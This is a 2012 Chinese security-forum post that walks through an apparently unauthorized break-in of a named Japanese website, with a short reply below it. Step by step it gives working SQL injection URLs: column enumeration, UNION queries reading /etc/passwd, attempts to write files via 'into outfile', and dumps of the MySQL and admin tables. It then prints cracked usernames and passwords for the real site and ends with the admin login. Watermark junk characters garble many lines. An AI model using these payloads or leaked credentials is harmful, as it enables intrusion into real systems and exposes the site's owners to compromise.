找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
返回列表 发新帖
查看: 4152|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

1 B( ]( w8 @# W! z6 V: f0 I/ c" u9 ^; r# A# r0 ^8 h
0x01. 检测 www.zuaa.jp 收集数据) A. u- p# @& a8 b8 h. J( I/ M/ D
+ P2 D. y" |* V' s
8 f9 \5 n& \- l- y! D4 v) a
whatweb
$ U- f7 S+ T: D9 q0 s. F
) H' r+ J, e3 |1 [+ A5 g) z+ U8 J( O' a2 ~4 U
利用NMAP扫描% ?- x4 i3 m3 v" O

' l) \. E3 q, ~( \: ?中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持1 s' ?( }, c. h! r/ G7 W" l& F, x
0x02.找注入点% H( \9 l  t1 ^2 u( M; g, \
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
0 j, o. o6 X/ v/ j1 R7 j. e- ?7 N; n2 L3 P! ~9 @# U

3 p) y* W  i. C6 L0x03.order by
* `: P3 n4 K" Q             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1; d' ^0 r' A8 t. x6 p
" Y8 G4 l+ q' }% [- O
order by 28报错,order by 27正常
  ^: J  G4 M: p8 Z/ N
6 \8 h. y/ I/ @0x04.   union手动查询3 A( @( v" e4 i) @9 r$ L
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( U6 i* J' U; {6 A% o添加到 27 时正常显示
& S* y- x9 U7 X; Y4 ~4 _- o' ~4 T9 G! [0 L+ ~" X) b3 c
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持* `2 T( m9 O, f
& @% e  I3 |" K' m$ T! ?7 S* P
0x05. info:" t: x- A4 |) y
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 & S. t5 p; x2 [6 k2 s% U" Y5 P1 r8 G0 m

0 B; B  l% P( Z) }# t" Kuser:            root@localhost
' A* u7 Y$ ?  |$ [6 D2 xdatabase:    openpne
5 Q  N0 r1 _' {0 S3 Hversion:      4.1.22
$ z* A; h2 I+ Cos:             portbld-freebsd5.4
/ j# y8 u) k$ ?8 C3 ^" O( |5 A+ c- Q+ t# q1 N9 G+ j
0x06. root用户" I( h& Z# o" i- q# j$ X3 m- X; ~5 X
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
# P5 U; I  r( Z7 G0 t7 U  j3 |0 Dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
2 K  V! P; E$ R  v2 t  j+ e% X  d7 Y  c) ?9 \' m. _
通过工具转换2 I- @& p* s, O& I, P' z
+ V5 p; B5 F- j
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
" J3 u( F+ O( q* @( O
  @1 u  t1 |/ {, B% j) `# Y/ m0x07. 利用 into outfile& e3 U+ B! z" e, C/ B: w8 d( j/ d
全部都失败
( Y! S! x0 S! ^$ I7 R# ~http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php( p4 e! h9 i- _( a1 p; h0 i# [& m
9 }; Y2 `) P( u! K  R3 ?' q/ F
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 7 O/ B# z4 B( P9 x8 d/ x0 G

. q8 l! b  w* E7 n( }) z页面显示“MDB2 Error:syntax error”
2 t4 R) f- y  o# N. t) y: H* [5 R/ W) x. @
0x08. 利用 mysql 4.1
- r0 P2 n8 U1 R, X" C- Q猜常规表名,字段未果 工具 sqlmap
, ~, }- n* j' k+ v+ D0 e1 g1 ?" H# G中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
, ~; k& m2 Q, |" V6 }' Z! l4 Y$ s$ M- [' I& G* x( g

! P  K5 V, v  b: L/ R: Y+ l# K* Q4 k7 u
0x09. 查找后台
" Z3 Z* R, d  x: s- ]' T利用 现有的各种 后台工具尝试都不行) ^4 W2 M6 x! G0 L+ m8 g# I
2 N6 C( Q0 e/ s7 T% t% X! e8 ^
0x10.  MySL外联方法
& }1 D8 D$ t+ e9 w8 _% u: V从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行' k/ h6 e" ]' i! ?) R
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user' g; d3 g' G! H- u0 n. O
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user2 h; m6 C. k, B
/ i/ W! i) N: U+ N. b
这个可以在 www.cmd5.com 解密0 L; P7 K. x8 z( K
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
0 T& w8 `2 i. j0 B3 Xchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad976 ?: K8 X6 K2 A# `7 f0 x, a+ x7 w7 F1 H
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???4 C  ~. a& R0 d$ L; ~7 F0 w
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
3 ?+ x9 Q* }, r9 H2 W工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
1 v) A* a" {2 a
  F* i1 Y, c' C$ f: Z. N
% w# X" D+ I( r- [* b/ N0 b0x11. 网站突破
9 E9 w7 C: E4 D6 Q5 R4 W  Z发现网站的源程序 openpne, google 下载 openpne 源码' |& ~: m! r6 B% F) W2 x0 d3 Q2 e

; q: {/ l7 K9 R5 W, ~
: U  M  L, u7 Q8 b* v, F# R0x12. 默认信息利用* V; ^+ G7 e6 j) y) j+ @
http://sns.zuaa.jp/?m=admin&a=page_login- b" {( O: p+ A4 b7 U
1 x" `, M7 F1 ~/ a! R& d6 d
表名 (c_admin_user) ,字段名(username,password)
/ C) Z/ n% _/ V: c' s* G* xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
. i! ]7 {8 L+ \. Y6 F# m# t7 L$ O$ L
解密6 L- b; g) Y, Q, e
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa20092 N' _9 z. l9 X$ R: N
zuaajp:c0923ec5857796a393da99905008c176,          zju18978 q* o! m( e3 t) M3 s# T( k

+ R" ?( [% r  Z; _中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持+ E' y, Y3 B+ d- h: C0 p3 Z

8 D, O3 c" D& {0x13. 登录后台
# U( J9 }5 A$ P, V; `. g- v- S; X
- Z% o4 S5 t" q
5 c) \1 v- F+ J# ~& i. d4 \
0x14. 小结7 t" j- L* @9 \( a. Q4 E
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。: c& y! I) @9 w$ v
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
: e; D3 M1 j* Q5 q------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain; `/ Y9 V4 f/ c6 V0 x# V
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持; J3 @5 a! }' Y# i$ `* N

( r: a: Z$ j4 s' d最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!" {% T* m4 x* [

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表